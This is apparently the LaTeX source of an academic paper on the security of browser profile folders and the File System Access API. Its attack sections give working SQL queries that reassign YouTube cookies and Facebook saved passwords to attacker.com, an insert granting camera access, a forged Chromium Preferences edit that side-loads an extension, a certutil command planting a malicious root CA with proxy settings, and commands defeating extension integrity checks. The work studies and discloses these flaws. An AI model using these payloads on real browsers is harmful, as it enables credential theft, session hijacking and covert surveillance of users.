User Profiles: The Achilles' Heel of Web Browsers

Web browsers provide the security foundation for our online experiences. Significant research has been done into the security of browsers themselves, but relatively little investigation has been done into how they interact with the operating system or the file system. In this work, we provide the first systematic security study of browser profiles, the on-disk persistence layer of browsers, used for storing everything from users' authentication cookies and browser extensions to certificate trust decisions and device permissions. We show that, except for the Tor Browser, all modern browsers store sensitive data in home directories with little to no integrity or confidentiality controls. We show that security measures like password and cookie encryption can be easily bypassed. In addition, HTTPS can be sidestepped entirely by deploying malicious root certificates within users' browser profiles. The Public Key Infrastructure (PKI), the backbone of the secure Web. HTTPS can be fully bypassed with the deployment of custom potentially malicious root certificates. More worryingly, we show how these powerful attacks can be fully mounted directly from web browsers themselves, through the File System Access API, a recent feature added by Chromium browsers that enables a website to directly manipulate a user's file system via JavaScript. In a series of case studies, we demonstrate how an attacker can install malicious browser extensions, inject additional root certificates, hijack HTTPS traffic, and enable websites to access hardware devices like the camera and GPS. Based on our findings, we argue that researchers and browser vendors need to develop and deploy more secure mechanisms for protecting users' browser data against file system attackers.

==> attacks.tex <==


\subsection{Bypass Chromium Cookies Encryption}
\label{sec:attacks_cookies}
A natural approach to bypassing encryption would be to engage in the process of reverse-engineering the key used by the browser to perform the cryptographic operation, as prior work has attempted~\cite{Sanchez-etal-20-CANS}. Instead, we found that, even without knowing the key, the encryption is trivially bypassed by an attacker with a write permission. The critical observation we made by analyzing the way the encrypted values were stored in the profile folders is that in all cases, there is not a hard link between the encrypted values and the website they belong to. In other words, the messages are not \emph{authenticated}~\cite{HMAC}. Therefore, an attacker can rewrite or copy the entries in the database to assign a website under their control. Then, when the user visits their website, the browser will decrypt the encrypted values and make them readable in clear to the attacker. 

To bypass encryption on cookies, one can copy rows in the original database, with the encrypted values, assign the name and set it to the attacker domain, then insert the modified rows back into the database. 
%One can even change the attributes of different cookies flags (for instance disable the HttpOnly flag to make cookies accessible to JavaScript or change the path  to \code{/} in order to force the browser into send all the cookies when the user visits the attacker landing page). Once the browser launches and the user visits the attacker domain, the browser will decrypt the encrypted cookies and send them to the attacker. 
Listing~\ref{lst:chromium_cookies_encryption_bypass} demonstrates this process where cookies from \url{youtube.com} are copied and sent to \url{attacker.com}
%
%
\begin{lstlisting}[language=SQL, caption={SQL query to bypass Chromium encryption of cookies. All the cookies of the target website, i.e. youtube.com are copied and set to the attacker domain attacker.com.}, label={lst:chromium_cookies_encryption_bypass}]
INSERT INTO cookies (host_key,top_frame_site_key,value,is_httponly,creation_utc,name,encrypted_value,path,expires_utc,is_secure,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party,last_update_utc) 
SELECT ".attacker.com","","",0,creation_utc,name,encrypted_value,path,expires_utc,is_secure,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party,last_update_utc FROM cookies
WHERE host_key = "youtube.com";
\end{lstlisting}
%
%
Once the browser launches and the user visits the attacker's website, the cookies are automatically decrypted and sent to the attacker. As one can notice, the \code{HttpOnly} flag is also disabled, making the cookies directly accessible to JavaScript as well. The read cookies can be used to populate a browsing session under the control of the attacker, leading to the hijacking of the user's browsing session~\cite{SessionHijacking}. The consequences can range from financial loss, access to sensitive and confidential, data, photos, access to private mail, etc. 

\subsection{Bypassing Passwords Encryption}
\label{sec:attacks_saved_credentials_and_passwords}

The intuition about bypassing the encryption process on the saved credentials, even for Firefox, is exactly the same as described for encrypted cookies in Chromium browsers (Section~\ref{sec:attacks_cookies}): the attacker makes copies of the encrypted passwords, changes the site name to one under their control and update the original databases with the new entries. 
%To ease the manipulations of the SQLite databases, the attacker can employ a backend server equipped with NPM packages like sqlite3~\cite{SQLite3NPM}
Listing~\ref{lst:chromium_passwords_encryption_bypass} shows a code snippet used to steal the user's Facebook credentials in a Chromium browser. 
\begin{lstlisting}[language=SQL, caption={SQL query to bypass Chromium encryption of passwords. All the credentials of the target website, i.e. \url{facebook.com} are copied and set to \url{attacker.com}. To retrive the stolen credentials, the attacker adds a form to their home page with the input fields named "email" and "pass".}, label={lst:chromium_passwords_encryption_bypass}]
INSERT INTO logins (origin_url,action_url,username_element,username_value,password_element,password_value,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,skip_zero_click,generation_upload_status,date_last_used,date_password_modified,date_received,sharing_notification_displayed) 
SELECT "https://attacker.com", "https://attacker.com/", "email", username_value, "pass", password_value, "https://attacker.com/", date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,skip_zero_click,generation_upload_status,date_last_used,date_password_modified,date_received,sharing_notification_displayed FROM logins 
WHERE origin_url = "https://www.facebook.com/"
\end{lstlisting}
Once the user visits the website under the control of the attacker, the home page has a form, which the browser will automatically populate with the stolen credentials after it decrypts them. At this point, the attacker can read the credentials and leverage them in the backend to log in as the user~\cite{SessionHijacking}. %~\footnote{Provided that no additional factors, e.g. 2FA are not enabled to finalize logins}. 
The same process has been followed for stealing Firefox browsers credentials, therefore we omit further details about this case. %to conserve space.

\subsection{Browser Extensions and Code Executions}
\label{sec:attacks_extensions}

For an attacker, extensions represent an interesting target, because, in addition to code execution (i.e. XSS~\cite{OWASP_Types_Of_XSS}), the attacker can abuse the privileges of the extension and its powerful APIs to access any user information: content scripts can be injected in web pages to read login credentials; the background script can inspect/modify requests and response, etc. % headers, requests bodies with the \code{webRequest} API for instance, grant access permissions to the camera, microphone, geolocation, web push notifications (See Section~\ref{sec:attacks_permissions}), with the \code{contentSettings} API~\footnote{\url{https://developer.chrome.com/docs/extensions/reference/api/contentSettings}}, etc. See Section~\ref{sec:responsible_disclosure} for details about our discussion with the vendors on these issues.

%With execute-able capability, an attacker can load and execute malicious code in all browsers. (See the Appendix for further details about this scenario). Nonetheless, with a write-able attacker, we have been able to execute malicious extensions in many Chromium-browsers and Firefox leveraging different techniques. 

\subsubsection{Firefox: adding a signed malicious extension} 
Instead of trying to bypass the integrity checks performed by Firefox, the intuition about this attack is to rather develop and upload a malicious-but-signed extension to a repository that is trusted by Firefox, e.g. AMO~\cite{AMO-Firefox}, then regularly install it in a Firefox profile, and copy the metadata generated by the browser and the extension signed XPI bundle to the victim user's browsing profile. Specifically, 2 files are to be copied:
(i) \code{extensions.json} which contains the list of installed extensions and the extension XPI bundle which is stored in the \code{extensions/} folder. 
Once the user launches their browser, the malicious extension(s) will be loaded and executed without them noticing. The browser will not complain because the extension is signed by Mozilla. 
In fact, malicious extensions are regularly found on AMO~\cite{AMO-Malicious-Addons}. Malicious extensions can also be kept unlisted so that researchers scanning these repositories do not find and report them, potentially leading to removal. Finally, an attacker can host an extension on a server under their control, as long it is served with the right \code{application/x-xpinstall} MIME type.


\subsubsection{Chromium: side-loading a developer extension}
\label{sec:chromium_side_loading_unsigned_extensions}

Similarly to the Firefox attack, attackers can also silently install a Chromium extension by modifying the browser profile. Even worse, Chromium-based browsers allow the installation of unpacked, previously unpublished extensions when the browser is in \emph{Developer mode}. Our main insight is that attackers can load such an extension in their own Chromium instance, and then transfer the extension to the same folder location on the victim's machine and modify the victim's profile to mark the extension installed and enabled, carefully preserving the integrity protection values~\cite{Sanchez-etal-20-CANS}. 
Concretely, we first copy the extension in \texttt{/tmp/mal-extension} on the victim's machine and then enable the extension by crafting an entrance in the \texttt{Preferences} file and modifying the corresponding hash value. 
\begin{lstlisting}[language=JavaScript, label={lst:firefox_temporary_addon_web_ext}, caption={Modifications to the Chromium's preference file in the profile, to install an unpacked, malicious extension.}]
  let prefs = JSON.parse(prefsFileFromProfile)  
  prefs["extensions"]["settings"]["fjjfbkngnepigchnpa"] = JSON.parse(`{...,"from_webstore":false,"granted_permissions":{...},"path":"/tmp/mal-extension","state":1,...}`);
  prefs["protection"]["macs"]["extensions"]["settings"]["fjjfbkngnepigchnpa"] = "6D4F0E88A85DDB4AA1A7...";
  // overwrite the preference file
\end{lstlisting}
Listing~\ref{lst:firefox_temporary_addon_web_ext} shows a fragment of the concrete payload, illustrating that  attackers have fine-grained control over the permissions granted to the extension, without user consent.
We observe that this attack is successful even when the victim's browser is not set in \emph{Developer mode}, allowing for stealthy installation of extensions.

%\done{Cris do you mind writing this section with the attack you reported to the Chrome Security team, where you abused symbolic links}

\subsubsection{Chromium: infecting a signed extension} 
\label{sec:infecting_chromium_extensions_fsa}
From discussions with various vendors, it appeared that the integrity checks on extensions are not enabled by default in the Chromium sources. This means that it is the responsibility and choice of each vendor to enable it. Hence, if one just builds a Chromium browser from the sources, or simply chooses not to enable this feature, future signed extensions that the user will install can be manipulated. The raw Chromium build is in this situation, which one may argue is expected. Are also affected all users (developers) building their own Chromium browser from the sources, to disable Google Services for privacy reasons~\cite{Ungoogled-Chromium}. But more interestingly, among the official browsers we have tested, we found that the Vivaldi browser does not enable integrity checks on extensions. Actually when considering malware on the user's machine, all Chromium browsers fail to properly perform integrity checks (See Section~\ref{sec:infecting_chromium_extensions_malware}).  As the company claims almost 3 million active users for its cross-platform browser~\cite{VivaldiUsers}, the portion of exposed (desktop) users may be rather substantial. 

%\todo{We way want to add information about extensions in the Chrome Web Store, the most popular permissions, and the versions: this is information that I can quickly gather. We can do the same for Opera browser}


\subsection{Bypassing User's Permissions}
\label{sec:attacks_permissions}

Listing~\ref{lst:attack_permissions_firefox} shows an SQLite query to modify the \code{permissions.sqlite} database in a Firefox profile directory to grant the attacker access to the camera.  
%Listing~\ref{lst:attack_permissions_firefox} demonstrates how to grant \code{https://attacker.com} access to the camera, microphone, GPS and web push notifications in a Firefox browser. 
%
\begin{lstlisting}[language=SQL, label={lst:attack_permissions_firefox}, caption={Editing the permissions.sqlite database to grant the attacker access to the user's camera.}]
INSERT INTO moz_perms (origin, type, permission, expireType, expireTime, modificationTime) values ("https://attacker.com", "camera", 1, 0, 0, 1702964711537);
\end{lstlisting}
Access to the microphone, GPS, or the ability to send them web push notifications are granted similarly.
%
\iffalse
\begin{lstlisting}
INSERT INTO moz_perms (origin, type, permission, expireType, expireTime, modificationTime) values ("https://attacker.com", "microphone", 1, 0, 0, 1702964711537);
INSERT INTO moz_perms (origin, type, permission, expireType, expireTime, modificationTime) values ("https://attacker.com", "geo", 1, 0, 0, 1702964711537);
INSERT INTO moz_perms (origin, type, permission, expireType, expireTime, modificationTime) values ("https://attacker.com", "desktop-notification", 1, 0, 0, 1702964711537);
\end{lstlisting}
\fi
%
Concretely, when the user visits the attacker's site, the browser will not prompt the user to grant permission to access these features as they would have been automatically and silently granted to the malicious website. The attacker can then turn on the user's microphone or camera, and track their physical location, and with a registered service worker, they can serve web push notifications~\cite{WebPushNotifications}. In Chromium browsers, the manipulations are similar and therefore omitted. 
%
%With this attack, the adversary can grant themselves a silent access to all of these devices, bypassing the user's content and permission prompt. 
%


\subsection{Custom Root Certificates and MitM Attacks}
\label{sec:attacks_mitms}
To mount a Man-in-the-middle (MiTM) attack where all requests and responses are redirected to an HTTPS proxy, one has to be able to (i) make the browser trust a custom root certificate authority (CA) and (ii) additionally instruct the browser to redirect all the traffic to the MiTM proxy. 

{\bf Firefox Browsers}
The \code{certutil} utility from the Network Security Service libraries~\cite{NSSDB} makes it easy to add custom CA to these files. To do so, one reads, serializes, and sends the content of these files to a backend server equipped with the \code{certutil} and a malicious root CA under the control of the attacker.  Then, the attacker adds their custom CA as shown in Listing~\ref{lst:attack_mitm_proxy}.
\begin{lstlisting}[label={lst:attack_mitm_proxy}, caption={Adding a custom CA to a CAs database: \code{temporary\_profile} is a folder containing the \code{cert9.db} and \code{key4.db} and \code{mitmproxy-ca-cert.pem} is the malicious root CA to be tagged \code{mitmproxy} in the CAs database.}, language=bash]
certutil -d temporary_profile -A -t C -n mitmproxy -i mitmproxy-ca-cert.pem
\end{lstlisting}
Then the updated \code{cert9.db} and \code{key4.db} are copied and returned to the user to replace the original custom CA databases. Finally, the attacker modifies the \code{prefs.js} file to indicate the location (IP and port number) of the MiTM proxy server, as shown in Listing~\ref{lst:attack_mitmproxy_ip_port_firefox}.
\begin{lstlisting}[language=JavaScript, label={lst:attack_mitmproxy_ip_port_firefox}, caption={Indicating the location (IP and port) of the MiTM proxy to Firefox. Here we are using a private local IP address, but any (publicly) accessible IP can be used.}]
user_pref('network.proxy.http', '127.0.0.1');
user_pref('network.proxy.http_port', 8080);
user_pref('network.proxy.ssl', '127.0.0.1');
user_pref('network.proxy.ssl_port', 8080);
user_pref('network.proxy.type', 1);
\end{lstlisting}
Now when the user launches the infected browser, all of their traffic is silently redirected to the MiTM proxy, where all HTTPS content is viewed in clear, and can be manipulated to inject additional code, log and exfiltrate credentials, hijack financial transactions, etc. This attack is particularly powerful, because even requests and responses issued by the browser itself, e.g. to check for updates or to download, verify, and install extensions, can be viewed and tampered with. 
In our demos, we extensively used the Mitmproxy~\cite{Mitmproxy} HTTPS proxy and developed a Python addon to view and manipulate request and response headers and bodies.

{\bf Chromium browsers}:
Manipulating the content of this folder is exactly the same as in the case of Firefox above (See Listing~\ref{lst:attack_mitm_proxy}). When this step is successful, the attacker is still left with indicating to the browser the location of the MiTM proxy server (IP and port). %~\footnote{An execute-able attacker could have used command line options to achieve this}. 
The solution we found -- because we are so far dealing with social engineering -- was to trick the user into installing a minimal browser extension. The logic of this extension is to invoke the proxy API to indicate the location (IP and port) of the HTTPS proxy server~\cite{WebExtensionProxyAPI}. For our controlled experiments, we developed, published, and kept unlisted such an extension on CWS~\cite{XPROXY}.

\iffalse
Listing~\ref{lst:attack_mitmproxy_ip_port_chromium}.
\begin{lstlisting}[language=JavaScript, label={lst:attack_mitmproxy_ip_port_chromium}, caption={Indicating the location (IP and port) of the MiTM proxy to a Chromium browser. Here we are using a private local IP address, but any (publicl)y accessible IP can be used, as in the case of Firefox (See Listing~\ref{lst:attack_mitmproxy_ip_port_firefox}).}]
chrome.proxy.settings.set({ value: { mode: "pac_script",
    pacScript: { data: "function FindProxyForURL(url, host) { return 'PROXY 127.0.0.1:8080'; }" }
}, scope: 'regular' }, function() {});
\end{lstlisting}
\fi



\subsection{Browsing History Sniffing}
\label{sec:attacks_history_sniffing}
\todo{To Fill in with the right information}
Users' browsing history, and other saved content may not seem as critical as passwords, but they have immense value to advertisers\cite{simon_hill}. Auto-fill data like people's names, addresses, emails, etc. may serve the attacker to spy on individuals. Emails can be gathered and sold to e.g. scammers, companies, or advertisers.

\begin{figure}[!htp]
    \centering
    \includegraphics[width=0.99\linewidth]{images/chromium_ignore_certificate_spki_errors}
    \caption{\code{----ignore-certificate-errors-spki-list}}
    \label{fig:chromium_ignore_certificate_spki_errors}
\end{figure}

==> executable.tex <==
\begin{table}[!htp]
    \footnotesize{
    \begin{tabular}{lll}
    \hline
    \bfseries{Chromium} & \bfseries{Firefox (web-ext)} & Description \\ \hline 
    \emph{user-data-dir} & \emph{firefox-profile}& Profile folder \\ \hline 
    \emph{disable-extensions-except} & - & Disable other extensions\\ \hline 
    \emph{load-extension} & \emph{source-dir} & Load extension at path \\ \hline 
    \emph{disable-web-security} & - & Disable CORS checks \\ \hline
    \emph{ignore-certificate-errors-spki-list} & - & Hash of custom CA \\ \hline 
    \emph{proxy-server} & - & proxy server IP/port \\ \hline 
        & \emph{network.proxy.ssl} & IP of proxy server \\ \hline 
        & \emph{network.proxy.ssl\_port} & Port of proxy server \\ \hline 
    \end{tabular}
    \caption{Chromium and Firefox command line options}
    \label{tab:chromium_command_line_options}
    }
\end{table}


\iffalse
\begin{figure}[!htp]
    \centering
    \includegraphics[width=0.99\linewidth]{images/chromium_disable_web_security_}
    \caption{\code{--disable-web-security}}
    \label{fig:chromium_disable_web_security}
\end{figure}

\begin{figure}[!htp]
    \centering
    \includegraphics[width=0.99\linewidth]{images/chromium_ignore_certificate_spki_errors_}
    \caption{\code{--ignore-certificate-errors-spki-list}}
    \label{fig:chromium_ignore_certificate_spki_errors}
\end{figure}
\fi

\section{The Executable Attacker vs. Browsers}
\label{sec:executable_attacker}
% Move part of the background, the fs_vs_browser profiles here...
Ultimately, browsers are programs that can be spawned from the command line with options that alter their runtime behavior. They also execute along other potentially adversarial programs that, given the sensitive nature of user information browsers handle, may be interested in compromising them to take advantage of user data. In this section, we discuss the specific capabilities of an execute-able attacker, i.e., malware running on the user's machine (See Section~\ref{sec:threatmodel}), in particular its impact on browseres and their profile folders. 

\subsection{Attacks via command line options}
\label{sec:browsers_command_line_options}
We discuss here a few security-related options shown in Table~\ref{tab:chromium_command_line_options}. Beyond security-related flags, we are interested in highlighting those that have an impact on profile folders. Finally, the list of flags considered here is far from being exhaustive and cannot all be discussed within the limits of this work. 

%
We note custom profile folders are extensively leveraged by software packaging and distribution systems like \snap, which stores profile folders under \home/snap/, and \flatpak\ which stores them under \code{\home/.var/}. Both systems support major Chromium and Gecko browsers on Linux. Custom profile folders are extensively leveraged by browser automation tools and frameworks like Puppeteer~\cite{Puppeteer}, Playwright~\cite{Playwright}, or Selenium~\cite{Selenium}. Finally, \webext, a framework dedicated to extension testing for Firefox browsers, also has support for custom profile folders~\cite{WebExtFirefox}.
%
%In Section~\ref{sec:attacks_execute_able} we discuss how an attacker can leverage these command line options.  

\subsubsection{Chromium browsers}
The effective list of Chromium browsers command line flags is provided at \url{chrome://flags} and is also maintained by Peter Beverloo~\cite{ChromiumCommandLineOptions}. Table~\ref{tab:chromium_command_line_options} provides an excerpt of command line options that can be taken advantage of. As can be seen from this subset, these options offer the ability to load unsigned (developer)  extensions, disable security mechanisms like CORS (Cross-origin resource sharing), or specify an HTTPS proxy provided the hash of its root CA and its IP and port number. 

The \code{ignore-certificate-errors-spki-list} indicates the hash of the root CA and the \code{proxy-server} flag indicates its IP and port number.  The \code{load-extension} and \code{disable-extensions-except} are handy flags that make it possible to load and execute unsigned developer extensions in a Chromium browser, and the \code{disable-web-security} flag disables the SOP. Concretely for the latter flag, its use disables Cross-Origin Resource Sharing (CORS)~\cite{CORS} checks on requests, meaning that websites can connect to one another origin servers without being restricted. This flag mandates that one indicates a custom browser profile (to avoid affecting the user's default browsing profile). Unfortunately, this requirement can be easily bypassed by either pointing to the default profile folder or a copy of it. Finally, the absence of SOP and the use of MiTM triggers dismissable informative message boxes in the Omnibox.

\subsubsection{Firefox Browsers}
Except for the option of switching between profile profiles (i.e. \emph{--profile, -P}), we are not aware of other security flags that can be passed when launching Firefox browsers. With that said, the vendor provides the \webext\ tool~\cite{WebExtFirefox}, originally meant for web extension management, but that offers many flags for deeply altering the browser behavior and taking advantage of it from an attacker perspective. As can be seen, custom (unsigned) extensions can be loaded, and HTTPS traffic redirected to a proxy server. 

Unsigned addons can be temporarily loaded using the \webext\ tool~\cite{WebExtFirefox}. One can further indicate the location of the browser profile folder to be used. Like in the case of Chromium, the attacker can either directly point to the user's default profile folder or point to a copy of it. Firefox browsers will warn users when the browser is launched with a custom temporary addon by would not prevent browsing. % (See Figure~\ref{fig:firefox_web_ext_visual_search_bar}). 





\subsection{Bypassing Extensions Integrity Checks}
\label{sec:infecting_chromium_extensions_malware}
In Section~\ref{sec:infecting_chromium_extensions_fsa}, we have shown that the raw Chromium build and Vivaldi browsers are vulnerable to extension manipulations because they do not enable the integrity checks of signed extensions installed by the user from trusted sources like the CWS~\cite{CWS-Chrome}. We found that all Chromium browsers on all operating systems are affected by this issue when abusing the execute-able capability of malware running on the user's machine. Our intuition was to remove the content of the unpacked extension \code{\_metadata/} folder and make it non-writable, as shown in Listing~\ref{lst:bypass_integrity_checks_extensions_chromium}.
%
\begin{lstlisting}[language=bash, caption={Bypass integrity checks of extensions on Chromium browsers by removing security metadata.}, label={lst:bypass_integrity_checks_extensions_chromium}]
rm _metadata/*
chmod a-w _metadata 
\end{lstlisting}
%
After these manipulations, we observed 2 different behaviors. Opera browser failed to perform the integrity checks. The adversary can therefore infect signed extensions permanently as if the integrity checks of extensions were not enabled in the browser in the first place (See Section~\ref{sec:infecting_chromium_extensions_fsa}). For other Chromium browsers, i.e. Chrome, Edge, Yandex, Brave, and Avast Secure, if the user launches the browser from the command line, the malicious code executes but the browser eventually detects the manipulations. This occurs after a certain delay during which code injected by the attacker in the extension will be successfully executed by the browser. See Section~\ref{sec:responsible_disclosure} for details about our discussion with the vendors on this issue. Finally, an attacker with write permission can perform denial-of-service (DoS) attacks against user-installed-signed extensions in Chromium and Firefox browsers when these browsers perform integrity checks. We note that only the Yandex browser warns the user with a visual informative box when it detects corrupted extensions. Other browsers offload the extension silently and may eventually reinstall it at the next browsing session.



==> fsa.tex <==
\done{Add a Figure with 3 different steps to illustrate everything}
\begin{figure*}[!htp]
    \minipage{0.33\textwidth}
     \begin{subfigure}{0.98\linewidth}
        \centering
        \includegraphics[width=0.99\linewidth]{images/file_browsing_3.png} 
        \caption{File Browsing}
        \label{fig:fsa_file_browsing}
     \end{subfigure}
    \endminipage
    \minipage{0.33\textwidth}
     \begin{subfigure}{0.98\linewidth}
        \includegraphics[width=0.99\linewidth]{images/read_permission.png} 
        \caption{Read Permission}
        \label{fig:fsa_read_permission}
     \end{subfigure}
     \endminipage
     \minipage{0.33\textwidth}
     \begin{subfigure}{0.98\linewidth}
        \includegraphics[width=0.99\linewidth]{images/write_permission.png} 
        \caption{Write Permission}
        \label{fig:fsa_write_permission}
     \end{subfigure}
     \endminipage\hfill
    \caption{File System Access API working: browsing, granting read and write permission}
    \label{fig:fsa_browsing_read_write}
\end{figure*}

\subsection{The File System Access (FSA) API}
\label{sec:fsa}
\label{sec:file_system_access_api}

{\bf The File System Standard}: Before digging into the FSA API, a couple of terminology clarification is needed. First, the File System (FS) API is a WHATWG standard~\cite{FSAPI} implemented by major browsers which brings read, write and file management capabilities to websites via JavaScript. Now, the File System \textbf{Access} (FSA) API can be seen as an instantiation of the FS API which exposes the user's physical device file system to JavaScript to perform read and write operations. There is another instantiation of the FS API referred to as the \textbf{Origin Private} File System (OPFS), which as the name suggests, assigns a virtual and private storage endpoint to websites restricted by the same-origin policy. It is the browser that controls where each origin's files are stored on the user's physical file system\footnote{Certainly in the browsing profile folder}. The OPFS can be seen as yet another client-side web storage accessible to web sites, just like localStorage, IndexedDB, Cache, etc.
All major browsers on major desktop platforms (Linux, Windows, Mac OSX) support the OPFS API, while the FSA API is only supported by Chromium-browsers (e.g. Chrome, Edge, Opera, Vivaldi, Yandex) with the notable exception of Brave browser. 

\done{Refer to the traditional ways of interacting with the file system}

{\bf FSA as a modern way of interacting with the user's file system}: Traditionally, websites have interacted with user's file system via different mechanisms combined~\cite{OPFS}. Notably, the \code{<input type=file [webkitdirectory]>} HTML snippet can be used to trigger a file(s) picker dialog that let the user browse the file system in search of specific files or directory. The file(s) can then be uploaded to a remote server, read, manipulated and the result written back to the file system with HTML snippet like \code{<a download="...">}. 
With the FSA API, all these operations comes handy to websites by directly using JavaScript. To take full advantage of the API, one proceeds as follows (See Figure~\ref{fig:fsa_browsing_read_write}).
\begin{enumerate}
    \item {\bf Browsing} the file system: the file or directory picker step is initiated with an invocation to the \code{showDirectoryPicker} or \code{showOpenFilePicker} functions (See Figure~\ref{fig:fsa_browsing_read_write}). The user then navigates the file system and selects the file or folder that the website requests access to. 
    \item {\bf Read} permission: once the user selects a file or directory, the browser checks that the selection is not part of the blocklist, and prompts the user with a confirmation dialog to grant \emph{read} access (See Figure~\ref{fig:fsa_read_permission}).. A handle (an instance of \code{FileSystemHandle}) representing the selection is given to the website, allowing enumeration (for directories), as well as metadata and content reading. 
    \item {\bf Write} permission: With a handle to the user's file system, one can write new content back to the file system from JavaScript: this can be new files or changes to existing ones. This step can be triggered by an invocation to the \code{showSaveFilePicker} function or invoke the \code{requestPermissions({mode: 'readwrite'}} method on the file handle which will further prompts the user to allow the write operations to their file system (See Figure~\ref{fig:fsa_write_permission}). 
\end{enumerate}

{\bf Security mechanisms}: With the FSA API, different cross-origin websites can access the same location the user's physical file system, meaning that the same-origin policy does not apply. For web sites relying on the data or code stored on the file system to perform sensitive operations, this can potentially lead to attacks like XSS. For users, multiple defense-in-depth security mechanisms guard the FSA API. 
\begin{itemize}
    \item {\bf The blocklist} is a list of folders and files which are made inaccessible with the FSA API~\cite{FSA_Blocklist}. This includes notably sensitive system folders like \code{/etc, /boot, /dev, /proc, /sys} on Linux\footnote{And similar folders on other platforms} or the user's home directory (e.g. \code{\$HOME}). Note that if access is denied to the user's home directory root, subfolders that it contains may be accessed, provided that they are not blocklisted (e.g. \code{\$HOME/.config, \$HOME/.dbus, \$HOME/.ssh} are forbidden). Notable entries of the blocklist worth noting are Chromium browsers profile folders (See Section~\ref{sec:browser_profiles} for more details). Finally, access to the current browser own profile folder is forbidden.
    \item {\bf User activation}~\cite{User_Activation} is required for their physical file system to be made accessible via the FSA API. The functions to start the file picker dialog can only be triggered in reaction to a user click for instance (e.g. \code{document.onclick = showDirectoryPicker}). Then, when a selection is made, the user is prompted again to give read permission. Read handles can be persisted in a local storage mechanism and later recovered to re-access files without the user being prompted again. Likewise, write operations also trigger prompts for the users to accept. Write permission granted after a permissio request are persisted by the browser, allowing future operations to be carried out without the needs to prompt the user again. 
    \item {\bf Mark-of-the-Web and Safe Browsing}: Before effectively writing the user's file system, files go through Google Safe browsing checks~\cite{Google_Safe_Browsing}. They also get the mark-of-the-Web~\cite{Mark_of_the_Web} which is leveraged by operating systems to warn users that a binary they are about to execute has been obtained from the Web and may be unsafe to run.
\end{itemize}


==> limitations.tex <==
\subsection{Limitations and Choices}
\label{sec:limitations}
We do not claim that the attacks discussed in this work are exhaustive. The files we have considered represent a tiny subset of the staggering amount of content that makes up profile folders. Yet, we have shown that this data is sufficient to mount all sorts of powerful attacks that give attackers access to sensitive user information and bypass browsers' security mechanisms. All in all, there are many more attacks that we have inconclusively attempted, many attacks that can be mounted differently, and additional social engineering and involvement from the user could open new possibilities for the attacker. Finding and demonstrating new attacks can be rewarding. Nonetheless, the choices we have made were to focus on high-profile attacks, to bring up scientific discussion about the new capabilities enabled by APIs like the FSA, and to question the security practices of browser vendors concerning storing user data on the file system. 

\subsection{Safari browser}
\label{sec:safari_browsers}
We have not performed a comprehensive investigation of Safari, the dominant Webkit family that runs on Mac OSX. Natively, this OS has many built-in access control mechanisms that restrict various applications' access to the file system. For instance, the \code{Libray/} folder from the user's home directory where many applications data is stored is not visible by default when performing file browsing. 
%
Nonetheless, the Safari browser is also affected by many of the attacks discussed so far with a couple of differences. Its profile folder is located under \code{Library/Safari/}. %It is only recently, starting from Safari 17, that support for additional custom profiles has been added to Safari browsers. Nonetheless, we are not  management of these profiles still requires manual interactions from user to set. 
WebExtensions are also supported but require user action to enable them in specific profiles. We are not aware of any security-related command line flag for the browser. Custom root CA can either be managed in a GUI or by a super user. 
%
This being said, browsing history, the most visited websites, bookmarks, and downloads are stored in clear and can be readily exfiltrated. Permission to access devices like the camera or microphone and the ability to send web push notifications can be granted to the attacker. Website client-side data is also present in the folder. While form data and information related to passwords are also stored in the profile, we have not been able to conclusively decode this information. They are encrypted and require user passwords to decode. 


\subsection{Mobile browsers}
\label{sec:mobile_browsers}
At the time of writing, no mobile browser supports the FSA API. Moreover, by design, mobile applications enjoy fewer privileges and flexibility when it comes to their ability to freely manipulate the file system, compared to their desktop counterparts. Mobile platforms implement sandboxing and access control mechanisms where applications can only access the data they write, much like with the OPFS API~\cite{OPFS}. %instantiation of the file system API. 



\iffalse 
With that said, browsing history, the most visited websites, bookmarks, and downloads are stored in clear and can readily exfiltrated.  (\code{History.db}), the most visited websites (\code{TopSites.plist}), bookmarks (\code{Bookmarks.plist}) or downloads (\code{Downloads.plist}) are stored in clear and can readily exfiltrated~\footnote{The \code{.pklist} is a binary format that can be converted to a textual format with the \code{plutil} utility}. 
Permission to access devices like the camera or microphone (\code{UserMediaPermissions.plist}) and the ability to send web push notifications (\code{UserNotificationPermissions.plist}) can be granted to the attacker. Website client-side data is also present in the folder. Form data is also stored in the profile and information related to passwords. Nonetheless, we have not been able to conclusively decode this information. They are encrypted and require user passwords to decode. 
\fi


==> motivations.tex <==
\crs{Please review the motivation and threat model sections to see if they should be merged and rephrased}.

\section{Motivations}
\label{sec:motivations}

\done{Rephrase the motivations to align them with the FSA attacker}
%File System Access API blacklisting mechanism is not misses many sensitive folders. 
The implementation of the file system access (FSA) API on Chromium browsers relies on a blocklisting mechanism, where folders containing so-called system files cannot be accessed by websites (See Section~\ref{sec:fsa}. It is well understood by the security community that the effectiveness of a blocklisting mechanism depends on how exhaustive it is. Indeed, as soon as the list misses at least 1 item, the whole underlying system it protects becomes completely ineffective. In this work, we report the many sensitive folders that are not covered by the current file system access API blocklist, and the security implications thereafter. Contrary to the claims of a recent work~\cite{Oz-etal-23-USENIX}, the blocklist \emph{does not include} the Firefox browsers profile folders, custom profile folders for Chromium-browsers other sensitive folders on Linux containing custom root certificate authorities trusted by many browsers including Chromium. We also found that by (ab)using symbolic links, the blocklist can be completely bypassed, giving access to sensitive locations, including the user's home directory. We aim to show the limitations of a blocklisting mechanism in a powerful API like the FSA, combined with bad security practices where browsers mix both code and data on the file system, and the lack or ineffectiveness of security mechanisms to protect sensitive user information. 
%
%In this paper and in order to demonstrate the impacts of our findings, we focus on a previously neglected weak attack surface of browsers, i.e., their persistence layer. Browsers are mostly shipped as stand-alone binaries so they need to store user data externally.  
%We aim to study this persistent layer of browsers, whether and how modern browsers store data on the disk and whether they use any mechanism to prevent tampering or exfiltrating user profiles data and more importantly the impact on a successful attacker that gains read and write permissions to this data. %If these weaknesses can be leveraged to mount all sorts of attacks against the user file system, we have chosen to demonstrate attacks against the browsers themselves, and in particular by reading and tampering with their browsing profile folders (See Section~\ref{sec:browser_profiles} and~\ref{sec:security}). Hence the title \code{ourobrowsers}, a term we made-up from \code{ouroboros} an ancient greek symbol representing a snake eating its own tail. \fra{Not absolutely necessary, but way not if we like analogies}




==> security.tex <==

\begin{table}[!htp]
    \centering
